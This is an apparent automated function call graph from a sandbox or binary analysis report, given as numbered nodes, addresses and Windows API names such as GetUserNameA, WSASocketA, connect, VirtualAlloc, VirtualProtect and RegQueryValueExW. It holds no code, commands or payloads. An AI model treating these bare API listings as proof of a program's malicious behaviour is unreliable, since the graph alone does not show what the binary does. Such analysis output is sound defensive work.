RtlFreeHeap _setmbcp setSBCS malloc _DllMainCRTStartup 121267->121348 121269 1912b77bb87 121349 1912b7829e0 RtlFreeHeap _DllMainCRTStartup 121269->121349 121271 1912b77bb94 121350 1912b78dfb4 RtlFreeHeap setSBCS malloc realloc 121271->121350 121273 1912b77bbb5 121351 1912b78dfb4 RtlFreeHeap setSBCS malloc realloc 121273->121351 121275 1912b77bbcf _DllMainCRTStartup 121277 1912b77bbdd _DllMainCRTStartup 121275->121277 121365 1912b78cf80 VirtualFree VirtualProtect RtlFreeHeap _DllMainCRTStartup 121275->121365 121278 1912b77bbf9 121277->121278 121366 1912b78cf80 VirtualFree VirtualProtect RtlFreeHeap _DllMainCRTStartup 121277->121366 121352 1912b77e738 RtlFreeHeap _DllMainCRTStartup 121278->121352 121281 1912b77bc05 121282 1912b77bc0e 121281->121282 121367 1912b78cf80 VirtualFree VirtualProtect RtlFreeHeap _DllMainCRTStartup 121281->121367 121353 1912b77e7b4 RtlFreeHeap _setmbcp setSBCS free malloc _DllMainCRTStartup 121282->121353 121285 1912b77bc13 121287 1912b77bc1c 121285->121287 121368 1912b78cf80 VirtualFree VirtualProtect RtlFreeHeap _DllMainCRTStartup 121285->121368 121288 1912b78e784 malloc RtlFreeHeap 121287->121288 121289 1912b77bc4f 121288->121289 121290 1912b77bc5c 121289->121290 121369 1912b78cf80 VirtualFree VirtualProtect RtlFreeHeap _DllMainCRTStartup 121289->121369 121354 1912b78dfb4 RtlFreeHeap setSBCS malloc realloc 121290->121354 121293 1912b77bc78 121355 1912b7851a0 121293->121355 121315 1912b78552c _DllMainCRTStartup RtlFreeHeap 121314->121315 121316 1912b78a9ac setSBCS _DllMainCRTStartup 121315->121316 121317 1912b78e784 malloc RtlFreeHeap 121316->121317 121318 1912b78aa39 setSBCS 121317->121318 121400 1912b78dfb4 RtlFreeHeap setSBCS malloc realloc 121318->121400 121320 1912b78aa6a _DllMainCRTStartup 121322 1912b78aa81 _setmbcp _DllMainCRTStartup 121320->121322 121401 1912b77e554 121320->121401 121323 1912b78ad0e setSBCS _DllMainCRTStartup 121322->121323 121324 1912b78e784 malloc RtlFreeHeap 121322->121324 121408 1912b78dfb4 RtlFreeHeap setSBCS malloc realloc 121322->121408 121323->121235 121324->121322 121327 1912b78c8a5 VirtualFree 121326->121327 121329 1912b78c81d _DllMainCRTStartup 121326->121329 121328 1912b7889c3 121327->121328 121328->121238 121328->121241 121329->121327 121329->121328 121331 1912b78e784 malloc RtlFreeHeap 121330->121331 121332 1912b78554d 121331->121332 121333 1912b78e784 malloc RtlFreeHeap 121332->121333 121336 1912b785555 setSBCS _DllMainCRTStartup 121332->121336 121334 1912b785561 121333->121334 121335 1912b78e744 free RtlFreeHeap 121334->121335 121334->121336 121335->121336 121336->121265 121338 1912b78e818 _callnewh 121337->121338 121343 1912b78e79c _callnewh _mtinitlocknum 121337->121343 121374 1912b79153c RtlFreeHeap _getptd_noexit 121338->121374 121342 1912b78e7fd 121372 1912b79153c RtlFreeHeap _getptd_noexit 121342->121372 121343->121342 121345 1912b78e802 121343->121345 121347 1912b78e80d 121343->121347 121370 1912b791614 RtlFreeHeap _NMSG_WRITE _set_error_mode 121343->121370 121371 1912b791688 RtlFreeHeap _NMSG_WRITE __crtMessageBoxW _set_error_mode _putenv_helper _invoke_watson 121343->121371 121373 1912b79153c RtlFreeHeap _getptd_noexit 121345->121373 121347->121267 121348->121269 121349->121271 121350->121273 121351->121275 121352->121281 121353->121285 121354->121293 121356 1912b7851be _DllMainCRTStartup 121355->121356 121375 1912b78a5f0 RtlFreeHeap _DllMainCRTStartup 121356->121375 121358 1912b7851e8 121376 1912b78fd14 RtlFreeHeap _getptd 121358->121376 121360 1912b7851ff _DllMainCRTStartup 121377 1912b785368 121360->121377 121362 1912b7852d4 _setmbcp setSBCS _DllMainCRTStartup 121386 1912b78a108 RtlFreeHeap _setmbcp _DllMainCRTStartup 121362->121386 121364 1912b785335 121370->121343 121371->121343 121372->121345 121373->121347 121374->121347 121375->121358 121376->121360 121378 1912b78552c _DllMainCRTStartup RtlFreeHeap 121377->121378 121379 1912b785391 _DllMainCRTStartup 121378->121379 121380 1912b7853df GetUserNameA 121379->121380 121381 1912b785408 121380->121381 121387 1912b77e548 WSASocketA WSAIoctl closesocket _DllMainCRTStartup 121381->121387 121383 1912b78540d strrchr _DllMainCRTStartup 121388 1912b78eb3c 121383->121388 121385 1912b7854e0 _DllMainCRTStartup 121385->121362 121386->121364 121387->121383 121390 1912b78eb6e setSBCS 121388->121390 121389 1912b78eb73 121397 1912b79153c RtlFreeHeap _getptd_noexit 121389->121397 121390->121389 121392 1912b78eb92 121390->121392 121398 1912b791d4c RtlFreeHeap 12 library calls 121392->121398 121394 1912b78ebc2 121395 1912b78eb78 _invalid_parameter_noinfo 121394->121395 121399 1912b791bc0 RtlFreeHeap 7 library calls 121394->121399 121395->121385 121397->121395 121398->121394 121399->121395 121400->121320 121409 1912b77e658 121401->121409 121403 1912b77e56f WSASocketA 121404 1912b77e591 121403->121404 121405 1912b77e598 WSAIoctl 121403->121405 121404->121322 121407 1912b77e5d9 closesocket 121405->121407 121407->121404 121408->121322 121410 1912b77e66c 121409->121410 121410->121403 121411 1912b2b00a9 121412 1912b2b00c0 121411->121412 121413 1912b2b00c8 SleepEx 121412->121413 121414 1912b2b00d5 121413->121414 121415 1912b77d6bc 121416 1912b77d71c setSBCS 121415->121416 121444 1912b78790c 121416->121444 121418 1912b77d74c 121419 1912b78eb3c _snprintf RtlFreeHeap 121418->121419 121420 1912b77d768 121419->121420 121447 1912b787074 121420->121447 121422 1912b77d78e 121423 1912b77d7ce 121422->121423 121463 1912b7822b0 RtlFreeHeap _setmbcp setSBCS _snprintf strchr _DllMainCRTStartup 121422->121463 121427 1912b77d7ef 121423->121427 121428 1912b77d801 121423->121428 121425 1912b77d7af 121464 1912b78214c RtlFreeHeap _setmbcp setSBCS _snprintf strchr _DllMainCRTStartup 121425->121464 121430 1912b78eb3c _snprintf RtlFreeHeap 121427->121430 121429 1912b78eb3c _snprintf RtlFreeHeap 121428->121429 121431 1912b77d7ff 121429->121431 121430->121431 121453 1912b77e510 121431->121453 121433 1912b77d826 121434 1912b77e510 _DllMainCRTStartup RtlFreeHeap 121433->121434 121435 1912b77d83f 121434->121435 121436 1912b77e510 _DllMainCRTStartup RtlFreeHeap 121435->121436 121437 1912b77d850 121436->121437 121438 1912b77da73 121437->121438 121457 1912b77db04 121437->121457 121440 1912b77e510 RtlFreeHeap _DllMainCRTStartup 121441 1912b77d89a _DllMainCRTStartup 121440->121441 121441->121440 121442 1912b77da26 _DllMainCRTStartup 121441->121442 121442->121438 121465 1912b7879a8 RtlFreeHeap _setmbcp free malloc _DllMainCRTStartup 121442->121465 121445 1912b78552c _DllMainCRTStartup RtlFreeHeap 121444->121445 121446 1912b787935 _DllMainCRTStartup 121445->121446 121446->121418 121448 1912b7870c3 _setmbcp setSBCS _DllMainCRTStartup 121447->121448 121449 1912b787831 121448->121449 121450 1912b787465 _setmbcp setSBCS _DllMainCRTStartup 121448->121450 121452 1912b78eb3c RtlFreeHeap _snprintf 121448->121452 121449->121450 121451 1912b78eb3c _snprintf RtlFreeHeap 121449->121451 121450->121422 121451->121450 121452->121448 121454 1912b77e521 121453->121454 121466 1912b78f6b8 121454->121466 121458 1912b77db2b 121457->121458 121459 1912b77e510 _DllMainCRTStartup RtlFreeHeap 121458->121459 121462 1912b77dbb1 121458->121462 121460 1912b77db98 121459->121460 121461 1912b77e510 _DllMainCRTStartup RtlFreeHeap 121460->121461 121461->121462 121462->121441 121463->121425 121464->121423 121465->121438 121469 1912b78f588 121466->121469 121468 1912b77e540 121468->121433 121470 1912b78f5b8 121469->121470 121471 1912b78f5bd 121470->121471 121472 1912b78f5da 121470->121472 121486 1912b79153c RtlFreeHeap _getptd_noexit 121471->121486 121487 1912b78f304 RtlFreeHeap __updatetmbcinfo _getptd __updatetlocinfo 121472->121487 121475 1912b78f5f8 121476 1912b78f61c 121475->121476 121477 1912b78f610 121475->121477 121489 1912b78f3ac RtlFreeHeap _invalid_parameter_noinfo _isleadbyte_l _errno _LocaleUpdate::_LocaleUpdate 121476->121489 121488 1912b79153c RtlFreeHeap _getptd_noexit 121477->121488 121480 1912b78f62c 121481 1912b78f632 121480->121481 121484 1912b78f644 121480->121484 121490 1912b79153c RtlFreeHeap _getptd_noexit 121481->121490 121483 1912b78f5c9 _invalid_parameter_noinfo 121483->121468 121484->121483 121491 1912b79153c RtlFreeHeap _getptd_noexit 121484->121491 121486->121483 121487->121475 121488->121483 121489->121480 121490->121483 121491->121483 121492 7ff71a8204ed 121495 7ff71a820507 121492->121495 121494 7ff71a820501 121496 7ff71a820965 121495->121496 121502 7ff71a820529 121495->121502 121542 7ff71a7aef50 37 API calls 121496->121542 121498 7ff71a82099e 121543 7ff71a7a8ce0 121498->121543 121501 7ff71a8206b1 121521 7ff71a846080 121501->121521 121502->121501 121505 7ff71a8205f2 121502->121505 121506 7ff71a82066b 121505->121506 121512 7ff71a82068c 121505->121512 121520 7ff71a7b0ea0 37 API calls 121505->121520 121506->121494 121507 7ff71a8207a5 WSASocketW 121509 7ff71a8207e4 WSAGetLastError 121507->121509 121507->121512 121511 7ff71a8207fe WSASocketW 121509->121511 121509->121512 121514 7ff71a820827 SetHandleInformation 121511->121514 121515 7ff71a8208cc WSAGetLastError 121511->121515 121512->121498 121512->121506 121512->121507 121512->121511 121513 7ff71a82085d bind 121512->121513 121526 7ff71a845850 121512->121526 121530 7ff71a8452d0 121512->121530 121541 7ff71a8454f0 43 API calls 121512->121541 121513->121496 121517 7ff71a8208a4 WSAGetLastError 121513->121517 121514->121512 121516 7ff71a82083e GetLastError 121514->121516 121515->121512 121519 7ff71a8208a9 closesocket 121516->121519 121517->121519 121519->121512 121520->121505 121524 7ff71a846095 121521->121524 121522 7ff71a85a1ac RtlAllocateHeap 121523 7ff71a8cd6fc 121522->121523 121524->121522 121525 7ff71a8460e6 121524->121525 121525->121512 121527 7ff71a84586b 121526->121527 121528 7ff71a845865 121526->121528 121546 7ff71a8214e0 121527->121546 121528->121512 121531 7ff71a84530a 121530->121531 121532 7ff71a8454bc 121530->121532 121534 7ff71a8454c4 121531->121534 121535 7ff71a845325 memcpy 121531->121535 121533 7ff71a845850 4 API calls 121532->121533 121533->121534 121554 7ff71a8458b0 121534->121554 121540 7ff71a845343 121535->121540 121537 7ff71a845429 getaddrinfo 121538 7ff71a845363 121537->121538 121539 7ff71a845473 WSAGetLastError 121537->121539 121538->121512 121539->121538 121540->121537 121540->121538 121541->121512 121594 7ff71a7b21d0 121543->121594 121545 7ff71a7a8cf8 121547 7ff71a821502 121546->121547 121548 7ff71a82156e closesocket 121546->121548 121547->121548 121549 7ff71a82164d 121547->121549 121550 7ff71a821546 WaitOnAddress 121547->121550 121548->121549 121553 7ff71a821645 RtlWakeAddressAll 121548->121553 121549->121528 121550->121547 121552 7ff71a821565 GetLastError 121550->121552 121552->121547 121553->121549 121555 7ff71a8458cd 121554->121555 121556 7ff71a845a13 121554->121556 121557 7ff71a8458dc 121555->121557 121558 7ff71a845a1f 121555->121558 121591 7ff71a7aef50 37 API calls 121556->121591 121560 7ff71a846080 RtlAllocateHeap 121557->121560 121592 7ff71a7a8ca0 37 API calls 121558->121592 121562 7ff71a8458f6 121560->121562 121563 7ff71a845a24 121562->121563 121564 7ff71a8458ff memcpy 121562->121564 121585 7ff71a7a8c80 121563->121585 121571 7ff71a845916 121564->121571 121566 7ff71a845a31 121567 7ff71a845a64 memset WSAStartup 121566->121567 121568 7ff71a845aa3 121566->121568 121569 7ff71a845a8e 121567->121569 121570 7ff71a845aaf 121567->121570 121572 7ff71a7aef50 37 API calls 121568->121572 121569->121538 121574 7ff71a822d70 37 API calls 121570->121574 121573 7ff71a845985 getaddrinfo 121571->121573 121572->121570 121575 7ff71a8459bf WSAGetLastError 121573->121575 121580 7ff71a8459d3 121573->121580 121576 7ff71a845adb 121574->121576 121575->121580 121577 7ff71a845b04 memset 121576->121577 121578 7ff71a845b43 121576->121578 121581 7ff71a845b24 121577->121581 121579 7ff71a7aef50 37 API calls 121578->121579 121579->121581 121580->121538 121582 7ff71a845b2e 121581->121582 121583 7ff71a822d70 37 API calls 121581->121583 121582->121538 121584 7ff71a845b7b 121583->121584 121586 7ff71a7a8c8f 121585->121586 121587 7ff71a7a8c94 121585->121587 121593 7ff71a7a8ca0 37 API calls 121586->121593 121589 7ff71a7a8ce0 37 API calls 121587->121589 121590 7ff71a7a8c99 121589->121590 121592->121563 121593->121587 121597 7ff71a849480 37 API calls 121594->121597 121598 7ff71a7e421e 121599 7ff71a7e4295 121598->121599 121600 7ff71a7e422c 121598->121600 121695 7ff71a823550 QueryPerformanceCounter 121599->121695 121622 7ff71a7e48d8 121600->121622 121603 7ff71a7e42b8 121604 7ff71a7e42ce 121603->121604 121605 7ff71a7e42dd 121603->121605 121710 7ff71a850572 41 API calls 121604->121710 121711 7ff71a85047c 41 API calls 121605->121711 121609 7ff71a7e42f7 memcpy 121611 7ff71a7e434f 121609->121611 121612 7ff71a7e48d8 54 API calls 121611->121612 121616 7ff71a7e4367 121612->121616 121613 7ff71a7e43c6 121614 7ff71a7e43fa 121713 7ff71a84d572 40 API calls 121614->121713 121616->121614 121619 7ff71a7e438f 121616->121619 121621 7ff71a7e43b5 121616->121621 121617 7ff71a7e425f 121617->121613 121715 7ff71a7cd6c3 38 API calls 121617->121715 121712 7ff71a84d572 40 API calls 121619->121712 121621->121613 121621->121617 121714 7ff71a7e523c 37 API calls 121621->121714 121623 7ff71a7e4961 connect 121622->121623 121624 7ff71a7e4908 121622->121624 121631 7ff71a7e4a81 121623->121631 121647 7ff71a7e4a86 121623->121647 121625 7ff71a7e50b0 121624->121625 121626 7ff71a7e4911 121624->121626 121835 7ff71a7b1d80 121625->121835 121629 7ff71a7e4925 121626->121629 121626->121647 121632 7ff71a7e50de 121629->121632 121640 7ff71a7e492e 121629->121640 121630 7ff71a7e50bc 121847 7ff71a84d266 37 API calls 121630->121847 121763 7ff71a7d36d2 GetLastError 121631->121763 121634 7ff71a7b1d80 37 API calls 121632->121634 121672 7ff71a7e50ea 121634->121672 121639 7ff71a7e4954 121639->121617 121640->121639 121642 7ff71a7e4cd8 121640->121642 121758 7ff71a84dbd5 121640->121758 121653 7ff71a7e4ddc 121642->121653 121774 7ff71a7dd08a 121642->121774 121644 7ff71a7e523b 121647->121639 121716 7ff71a84e10f 121647->121716 121648 7ff71a7e4b3a 121650 7ff71a7e4b76 121648->121650 121651 7ff71a7e4b48 121648->121651 121734 7ff71a7c16bd 121650->121734 121764 7ff71a820337 38 API calls 121651->121764 121652 7ff71a7e4d93 121652->121642 121657 7ff71a7e4f8f WSAGetLastError 121652->121657 121834 7ff71a7dd304 38 API calls 121653->121834 121657->121642 121659 7ff71a7e4b5a 121816 7ff71a84951a 121659->121816 121661 7ff71a7e505f 121826 7ff71a84d3ff 121661->121826 121663 7ff71a7e4c4f 121663->121630 121670 7ff71a7e4cb1 121663->121670 121739 7ff71a7c8922 121663->121739 121666 7ff71a7e4d18 121668 7ff71a7e4d6f 121666->121668 121666->121672 121743 7ff71a7d4165 121666->121743 121669 7ff71a7e5127 121668->121669 121668->121670 121673 7ff71a7e4e02 121668->121673 121848 7ff71a7ab800 121669->121848 121815 7ff71a849ba8 37 API calls 121670->121815 121851 7ff71a7ade90 37 API calls 121672->121851 121673->121630 121765 7ff71a7d42f2 WSAGetLastError 121673->121765 121675 7ff71a7e4e94 121767 7ff71a7d2b32 121675->121767 121676 7ff71a7e4e41 121676->121675 121677 7ff71a7e4fe8 121676->121677 121766 7ff71a7d42f2 WSAGetLastError 121676->121766 121814 7ff71a7d221c CloseHandle 121677->121814 121681 7ff71a7e4ea4 121682 7ff71a7c8922 2 API calls 121681->121682 121683 7ff71a7e4ef6 121682->121683 121683->121630 121683->121672 121684 7ff71a7e4f3b 121683->121684 121773 7ff71a7d4051 38 API calls 121684->121773 121696 7ff71a823624 GetLastError 121695->121696 121697 7ff71a823573 121695->121697 121912 7ff71a7ade90 37 API calls 121696->121912 121699 7ff71a823583 QueryPerformanceFrequency 121697->121699 121704 7ff71a8235af 121697->121704 121700 7ff71a82359b 121699->121700 121701 7ff71a82365f GetLastError 121699->121701 121700->121704 121914 7ff71a7ac910 37 API calls 121700->121914 121913 7ff71a7ade90 37 API calls 121701->121913 121704->121603 121705 7ff71a8236a6 121915 7ff71a85a6d0 RtlCaptureContext RtlUnwindEx abort 121705->121915 121711->121609 121712->121621 121713->121621 121714->121617 121715->121613 121717 7ff71a84e11e 121716->121717 121719 7ff71a84e12f 121717->121719 121852 7ff71a84e873 121717->121852 121721 7ff71a84e137 121719->121721 121857 7ff71a7d973a 37 API calls 121719->121857 121722 7ff71a7e4b01 121721->121722 121858 7ff71a84e49c 37 API calls 121721->121858 121725 7ff71a84bbc9 121722->121725 121726 7ff71a84bbdb 121725->121726 121727 7ff71a7e4b2e 121725->121727 121860 7ff71a7aef70 37 API calls 121726->121860 121730 7ff71a84fe6c 121727->121730 121731 7ff71a84fe7e 121730->121731 121732 7ff71a84fe90 121730->121732 121731->121648 121861 7ff71a826910 WaitOnAddress GetLastError 121732->121861 121735 7ff71a7c16d4 121734->121735 121736 7ff71a7c16d9 memcpy 121735->121736 121737 7ff71a7a8ce0 37 API calls 121735->121737 121736->121630 121736->121663 121738 7ff71a7c16eb 121737->121738 121740 7ff71a7c895b 121739->121740 121742 7ff71a7c8938 121739->121742 121862 7ff71a826910 WaitOnAddress GetLastError 121740->121862 121742->121666 121744 7ff71a7d41cb 121743->121744 121745 7ff71a7d41d3 RtlNtStatusToDosError 121744->121745 121748 7ff71a7d4257 121744->121748 121863 7ff71a7a9140 37 API calls 121745->121863 121747 7ff71a7d4235 121864 7ff71a7d2bdb 37 API calls 121747->121864 121749 7ff71a7d42d4 121748->121749 121753 7ff71a7d4293 121748->121753 121866 7ff71a7d36d2 GetLastError 121749->121866 121752 7ff71a7d42d9 CloseHandle 121754 7ff71a7d4247 121752->121754 121755 7ff71a7d2b32 37 API calls 121753->121755 121754->121668 121756 7ff71a7d429d 121755->121756 121756->121754 121865 7ff71a84d32a 37 API calls 121756->121865 121759 7ff71a84dbec 121758->121759 121760 7ff71a84dbe0 121758->121760 121867 7ff71a7aef50 37 API calls 121759->121867 121760->121652 121763->121647 121764->121659 121765->121676 121766->121676 121868 7ff71a850a22 121767->121868 121770 7ff71a7d2b4c 121770->121681 121771 7ff71a7a8ce0 37 API calls 121772 7ff71a7d2b5f 121771->121772 121772->121681 121775 7ff71a7dd0b0 121774->121775 121813 7ff71a7dd19e 121774->121813 121776 7ff71a84bbc9 37 API calls 121775->121776 121778 7ff71a7dd0d0 121776->121778 121777 7ff71a84fe6c 2 API calls 121779 7ff71a7dd1c9 121777->121779 121780 7ff71a7dd1a0 121778->121780 121781 7ff71a7dd0d9 121778->121781 121790 7ff71a84951a 41 API calls 121779->121790 121890 7ff71a84a365 HeapFree 121780->121890 121783 7ff71a7c8922 2 API calls 121781->121783 121784 7ff71a7dd0ee 121783->121784 121786 7ff71a7dd23d 121784->121786 121787 7ff71a7dd0f7 121784->121787 121785 7ff71a7dd1b1 121788 7ff71a84d3ff 39 API calls 121785->121788 121891 7ff71a7ade90 37 API calls 121786->121891 121876 7ff71a7d21ee 121787->121876 121788->121813 121793 7ff71a7dd20d 121790->121793 121792 7ff71a7dd10a 121880 7ff71a7d4394 121792->121880 121794 7ff71a7dd22f 121793->121794 121892 7ff71a849c22 37 API calls 121793->121892 121794->121653 121798 7ff71a84fe6c 2 API calls 121799 7ff71a7dd12e 121798->121799 121800 7ff71a7dd13e 121799->121800 121803 7ff71a7dd276 121799->121803 121884 7ff71a84bbf0 121800->121884 121801 7ff71a849bd0 121801->121653 121804 7ff71a7dd08a 45 API calls 121803->121804 121808 7ff71a7dd2c4 121804->121808 121805 7ff71a7dd183 121809 7ff71a84d3ff 39 API calls 121805->121809 121806 7ff71a7dd155 121806->121805 121888 7ff71a84d450 38 API calls 121806->121888 121811 7ff71a7dd08a 45 API calls 121808->121811 121810 7ff71a7dd190 121809->121810 121810->121813 121889 7ff71a7dd304 38 API calls 121810->121889 121811->121793 121813->121777 121814->121670 121815->121659 121817 7ff71a849523 121816->121817 121817->121661 121819 7ff71a84954c 121817->121819 121902 7ff71a850a18 121817->121902 121820 7ff71a8495b3 121819->121820 121896 7ff71a849b81 121819->121896 121821 7ff71a849605 121820->121821 121907 7ff71a84964e 40 API calls 121820->121907 121821->121661 121824 7ff71a849587 121824->121820 121900 7ff71a7d310f CloseHandle 121824->121900 121827 7ff71a84d411 121826->121827 121832 7ff71a84d435 121826->121832 121909 7ff71a7d40df 37 API calls 121827->121909 121829 7ff71a85a004 closesocket 121829->121653 121831 7ff71a8cd8bc 121829->121831 121832->121829 121834->121639 121836 7ff71a7ab800 37 API calls 121835->121836 121838 7ff71a7b1db8 121836->121838 121837 7ff71a7b1e23 121837->121630 121838->121837 121910 7ff71a7ab600 37 API calls 121838->121910 121911 7ff71a848490 37 API calls 121848->121911 121851->121644 121853 7ff71a84e89b 121852->121853 121854 7ff71a84e889 121852->121854 121859 7ff71a7acd70 37 API calls 121853->121859 121854->121719 121861->121731 121862->121742 121863->121747 121864->121754 121865->121754 121866->121752 121869 7ff71a7d2b47 121868->121869 121870 7ff71a850a32 121868->121870 121869->121770 121869->121771 121872 7ff71a7b2130 121870->121872 121873 7ff71a7b2142 121872->121873 121874 7ff71a846080 RtlAllocateHeap 121873->121874 121875 7ff71a7b215b 121874->121875 121875->121869 121877 7ff71a7d21f9 121876->121877 121879 7ff71a7d220a 121876->121879 121877->121879 121893 7ff71a7d2262 37 API calls 121877->121893 121879->121792 121881 7ff71a7d439e 121880->121881 121882 7ff71a7d43a6 121880->121882 121894 7ff71a7d435f 40 API calls 121881->121894 121882->121798 121885 7ff71a84bc0e 121884->121885 121886 7ff71a84bc06 121884->121886 121885->121806 121895 7ff71a84d32a 37 API calls 121886->121895 121888->121805 121890->121785 121891->121803 121892->121801 121893->121879 121895->121885 121897 7ff71a849b8d 121896->121897 121898 7ff71a849ba1 121897->121898 121908 7ff71a849ba8 37 API calls 121897->121908 121898->121824 121901 7ff71a7d3126 121900->121901 121901->121820 121903 7ff71a850a21 121902->121903 121904 7ff71a7b2180 HeapFree 121902->121904 121903->121819 121906 7ff71a8cd704 121904->121906 121907->121821 121908->121897 121912->121700 121913->121700 121914->121705 121916 7ff71a85a78b 121915->121916 121920 7ff71a85a795 121915->121920 121921 7ff71a85a670 RaiseException 121916->121921 121919 7ff71a85a790 abort 121919->121920 121920->121919 121922 7ff71a85a300 RaiseException 121920->121922 121921->121919 121922->121920 121923 1912b78c6d4 121926 1912b78c70a _DllMainCRTStartup 121923->121926 121924 1912b78c7b0 VirtualAlloc 121925 1912b78c7a4 121924->121925 121926->121924 121926->121925 121927 1912b78c8c4 121930 1912b78c8fb _DllMainCRTStartup 121927->121930 121928 1912b78c99e VirtualProtect 121929 1912b78c992 121928->121929 121930->121928 121930->121929 121931 7ff71a7d4939 121932 7ff71a7d4942 121931->121932 121935 7ff71a7d49e2 121931->121935 121934 7ff71a7d4a2a 121932->121934 121945 7ff71a816696 121932->121945 121935->121934 121936 7ff71a7d4a2c 121935->121936 122036 7ff71a8234f0 121935->122036 121936->121934 122044 7ff71a824440 39 API calls 121936->122044 121937 7ff71a7d49cf 122035 7ff71a7d4866 37 API calls 121937->122035 121940 7ff71a7d49c3 122034 7ff71a7aef50 37 API calls 121940->122034 121942 7ff71a7d49ad RtlWakeAddressSingle 121943 7ff71a7d4962 121942->121943 121943->121934 121943->121937 121943->121940 121943->121942 121946 7ff71a8166b7 121945->121946 121947 7ff71a8166dd 121945->121947 122033 7ff71a816696 70 API calls 121946->122033 121948 7ff71a7ab800 37 API calls 121947->121948 121949 7ff71a81670f 121948->121949 122045 7ff71a81850e 121949->122045 121950 7ff71a8166b9 121950->121943 121952 7ff71a81673d 121953 7ff71a8167b0 121952->121953 121954 7ff71a8167a0 121952->121954 122055 7ff71a8183e5 121953->122055 121955 7ff71a7d5406 37 API calls 121954->121955 121957 7ff71a8167a8 121955->121957 121959 7ff71a859e61 RegCloseKey 121957->121959 121958 7ff71a8167cc 122063 7ff71a7d5406 121958->122063 121982 7ff71a816bba 121959->121982 121961 7ff71a8167c7 121961->121958 121964 7ff71a8183e5 39 API calls 121961->121964 121966 7ff71a81681d 121964->121966 121966->121958 121970 7ff71a816b5a 121966->121970 122070 7ff71a859e30 121966->122070 121967 7ff71a816bdc 122078 7ff71a8437a0 37 API calls 121967->122078 121970->121958 121972 7ff71a817207 121970->121972 121971 7ff71a816bf9 121984 7ff71a816c53 121971->121984 122079 7ff71a81726c 66 API calls 121971->122079 121975 7ff71a859e61 RegCloseKey 121972->121975 121974 7ff71a816c28 121974->121984 122080 7ff71a81726c 66 API calls 121974->122080 121976 7ff71a817224 121975->121976 121978 7ff71a859e61 RegCloseKey 121976->121978 121978->121982 121980 7ff71a816c89 121985 7ff71a816cb4 121980->121985 122082 7ff71a81726c 66 API calls 121980->122082 121981 7ff71a816a58 121981->121970 121992 7ff71a816b40 121981->121992 122004 7ff71a7d0f61 38 API calls 121981->122004 122077 7ff71a817235 37 API calls 121982->122077 121983 7ff71a8168a0 121983->121981 122074 7ff71a859df2 37 API calls 121983->122074 122075 7ff71a7d0f61 38 API calls 121983->122075 122081 7ff71a81726c 66 API calls 121984->122081 122083 7ff71a81726c 66 API calls 121985->122083 121989 7ff71a816cdb 121991 7ff71a816d06 121989->121991 122084 7ff71a81726c 66 API calls 121989->122084 121998 7ff71a816d5c 121991->121998 122085 7ff71a81726c 66 API calls 121991->122085 122076 7ff71a7d0f61 38 API calls 121992->122076 121996 7ff71a816d3c 122086 7ff71a81726c 66 API calls 121996->122086 122026 7ff71a816e2c 121998->122026 122087 7ff71a817235 37 API calls 121998->122087 122000 7ff71a816dc0 122005 7ff71a816dca 122000->122005 122090 7ff71a8204c8 122000->122090 122004->121981 122006 7ff71a816de9 122005->122006 122007 7ff71a816e8a 122005->122007 122088 7ff71a8172d0 38 API calls 122006->122088 122093 7ff71a81738f 38 API calls 122007->122093 122010 7ff71a816df4 122011 7ff71a816dfd 122010->122011 122012 7ff71a817045 122010->122012 122089 7ff71a7a94c0 38 API calls 122011->122089 122110 7ff71a7a9140 37 API calls 122012->122110 122014 7ff71a808348 37 API calls 122031 7ff71a816ea4 122014->122031 122016 7ff71a816e16 122113 7ff71a8173bf 66 API calls 122016->122113 122017 7ff71a81709c 122111 7ff71a8173bf 66 API calls 122017->122111 122020 7ff71a8170bc 122112 7ff71a7a9140 37 API calls 122020->122112 122024 7ff71a817106 122025 7ff71a817131 memset 122024->122025 122024->122026 122025->122026 122114 7ff71a7d542d 122026->122114 122031->122014 122031->122024 122031->122026 122094 7ff71a81738f 38 API calls 122031->122094 122095 7ff71a7d751e 122031->122095 122105 7ff71a8514f6 37 API calls 122031->122105 122106 7ff71a8172d0 38 API calls 122031->122106 122107 7ff71a7d74cc 39 API calls 122031->122107 122108 7ff71a7a9140 37 API calls 122031->122108 122109 7ff71a8173bf 66 API calls 122031->122109 122033->121950 122035->121935 122141 7ff71a822a50 122036->122141 122038 7ff71a823500 122041 7ff71a823510 122038->122041 122154 7ff71a822b20 37 API calls 122038->122154 122043 7ff71a82351b 122041->122043 122155 7ff71a7aef70 37 API calls 122041->122155 122043->121935 122044->121936 122047 7ff71a818544 122045->122047 122046 7ff71a818665 122046->121952 122047->122046 122048 7ff71a81869d 122047->122048 122051 7ff71a850a22 RtlAllocateHeap 122047->122051 122049 7ff71a7a8c80 37 API calls 122048->122049 122050 7ff71a8186a8 122049->122050 122052 7ff71a8185b9 122051->122052 122052->122048 122053 7ff71a8185c2 122052->122053 122053->122046 122119 7ff71a859d7f 122053->122119 122056 7ff71a81850e 37 API calls 122055->122056 122057 7ff71a818413 122056->122057 122133 7ff71a807935 122057->122133 122059 7ff71a81843b 122060 7ff71a81843f RegQueryValueExW 122059->122060 122061 7ff71a859e30 37 API calls 122059->122061 122060->122059 122062 7ff71a818474 122060->122062 122061->122059 122062->121961 122064 7ff71a7d542d 37 API calls 122063->122064 122065 7ff71a7d541d 122064->122065 122066 7ff71a859e61 122065->122066 122067 7ff71a859fc4 RegCloseKey 122066->122067 122068 7ff71a859e74 122066->122068 122069 7ff71a8cd954 122067->122069 122068->121957 122071 7ff71a859e4b 122070->122071 122072 7ff71a859e46 122070->122072 122073 7ff71a859d7f 37 API calls 122071->122073 122072->121983 122073->122072 122074->121983 122075->121983 122076->121970 122077->121967 122078->121971 122079->121974 122080->121984 122081->121980 122082->121985 122083->121989 122084->121991 122085->121996 122086->121998 122087->122000 122088->122010 122089->122016 122091 7ff71a8204d1 memcmp 122090->122091 122092 7ff71a8204e6 122090->122092 122091->122092 122092->122005 122093->122031 122094->122031 122136 7ff71a850db8 122095->122136 122098 7ff71a7d7542 122098->122031 122099 7ff71a7a8c80 37 API calls 122100 7ff71a7d755a 122099->122100 122140 7ff71a7d7330 38 API calls 122100->122140 122102 7ff71a7d7570 122103 7ff71a7d542d 37 API calls 122102->122103 122104 7ff71a7d757f 122103->122104 122104->122031 122105->122031 122106->122031 122107->122031 122108->122031 122109->122031 122110->122017 122111->122020 122112->122016 122113->122026 122115 7ff71a7d543e 122114->122115 122116 7ff71a7d5453 122115->122116 122117 7ff71a7a8ce0 37 API calls 122115->122117 122116->121943 122118 7ff71a7d5465 122117->122118 122125 7ff71a850cd5 122119->122125 122122 7ff71a859da1 122122->122053 122123 7ff71a7a8c80 37 API calls 122124 7ff71a859dae 122123->122124 122126 7ff71a850d49 122125->122126 